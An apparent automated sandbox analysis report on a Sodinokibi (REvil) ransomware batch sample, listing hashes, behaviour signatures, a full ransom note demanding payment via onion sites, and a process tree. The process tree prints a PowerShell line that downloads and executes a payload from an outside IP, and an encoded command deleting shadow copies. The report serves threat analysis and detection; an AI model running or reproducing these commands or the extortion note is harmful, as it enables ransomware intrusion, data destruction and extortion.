Analysis

  • max time kernel
    141s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    15-05-2020 19:19

General

  • Target

    399c49693a18efe92bd488070ce05958.bat

  • Size

    219B

  • MD5

    9f6f9d198ba17e88e3aaeab145105bbd

  • SHA1

    24970fd1d68dd8c11b435442a710939a1d25def5

  • SHA256

    e929eaff3a0856e72e5085f1829ec9794c8f729a198e10ff6376bd423bf6b593

  • SHA512

    55359357d68d59d6dd7412600bb3ce137de55bc4dbd2569c2fc8082b9e070e20f74e90533caa09c455a8d97403600203abac9612c6f5aee39dfe8007062491bf

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/399c49693a18efe92bd488070ce05958

Extracted

Path

C:\9de3aymb46-read-me.txt

Family

sodinokibi

Ransom Note
---=== Welcome Aurora Cares LLC ===--- [+] Whats Happen? [+] Your internal network has been penetrated. Your files are encrypted with strong military algorithm, and currently unavailable. You can check it: all files on your system has extension 9de3aymb46. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). Also, all your business info copyed to our servers. Personal data of your patient and business contacts extracted. If you do not take action to contact us, the data will be published fo free access everyone. As soon as we receive the payment, all data will be deleted from our servers. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BAD69E750055A332 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/BAD69E750055A332 Contact with us in chat on website. You have 3 days. If you need more time to make a decision and collect money for payment - inform the support chat about this. [+] How will the decryption process proceed after payment? [+] After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: gx/xvad0JGZ0heDu6Thn3r3Z2qd30w35Y1iv6i7Jd+94Gv6PZd0ukZma0vfW+8o7 AxIf0hg3HyH6kOBiDdC/Tuxi6O9ypszrDsUT3sff1S78ucAizb3RojiAtaqjonY7 r4FsRD2ZyPJ7wnob7ERJnEAjX1y3r414nKYjbfhaoaprdkO5K1X5fIX1Nt/vj68V YxOvIhAdLQL3BlZV/ctNPGeTukZWEzFLjSUWhHgumnM6GSEb1LN7jETazZiOBNNL K7gi9fxFe+7RYpse6uvpYuWYNTDxL7pRjZo4nin8jfcbWNG/gC91skhDEKt+5JF2 t8OKGfAJZTVyEd1cQKNFbhmbmUCBiv8oFzK7LCnJXiRnF+SA/PhQzUgG4PuBy5FO y07lI/xOqiKP8O9m9RGFL3pB2/mHEYHZgOaoSbKau+9BcEyL+u9KWu0ucfkPUuSe WKv28XNewoWWbH5E8SjJ3PnAM5cLnr0R4uOYwn+jLi+L0nomBAp6kGZVSPY1/ADH H/a/qPNstaXqYz5D5AHgYHgnlev3hJHU1n7UhEkBpI58zeWqLIoA7TnSF2VC8rt8 5Nc/vil35oeDehvZc8t7odZoK9FciZPbpGyAXRSUIIN00IwDu6kVGzKq11mPxlav VdFBUwFBJ96kghnL51FcUD8gasI6cZLIG76nhGTOhG7g6okU8OIBTYlpeD/hFvJY V6uKeN8pM2aE7/fu55OYvfX9fX+TzCPdtMttwMS+GwQZZ2iQqlDbd14i2OzRzEs0 RmlvgNWvPt+sSAb/e95oA6INTtPFtT1NpFCykRsieY8Rsooe5kwo7cU7vD2zhmly Ex15/A8dbmJxQmDyNlfMJrDBAgga6zV1YIRdkc008KPgsqxCTRF5sV/W8E/2nagu 9/mVaGeI2U+3SJwdFCojkyc8v2yD952hmXE22xM4sj+BzMEP1KRWl+RMV4UTUC/k YMo+tbym0KDFCLQHtcp/sAUQCgFbVHATZ9Th9bfF1tVKNRBZZWygbgnluIzyHYhu kipWo7rgyB9Rpl4eFjQYXNKbGIYNeSvrDEKXnLwN3/Lqb1/RisKmv3Q5VJkmpds4 Ad93h8+LCeG7kEZf+RdkQO8FZu/o21Dk0zL52z74PrNJYOUPZj45w4sCWnlrnvOy ruevNA1SVgjZRI/ctWrOa0cPm3iIyl0jNkhB5UeRjcrg8u7nmwTMO3YV7vSZA4Ka 8kIJuHMuqdYs6fZJzC/W4Q+of8qtQa+YEYkVwYPonDb9jbzvNff/MDM0gBwfPaXd nJQ2FXMR0vMtiqM8XZRrYEF5WFwL9IucX/zcJ2Uh2fEqRtM0HU6Tow== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BAD69E750055A332

http://decryptor.cc/BAD69E750055A332

Signatures

  • Blacklisted process makes network request 143 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies service 2 TTPs 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Drops file in Program Files directory 35 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\399c49693a18efe92bd488070ce05958.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1412
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/399c49693a18efe92bd488070ce05958');Invoke-ESZSYMZBHPFU;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Drops file in System32 directory
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:1496
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1040
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1776

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms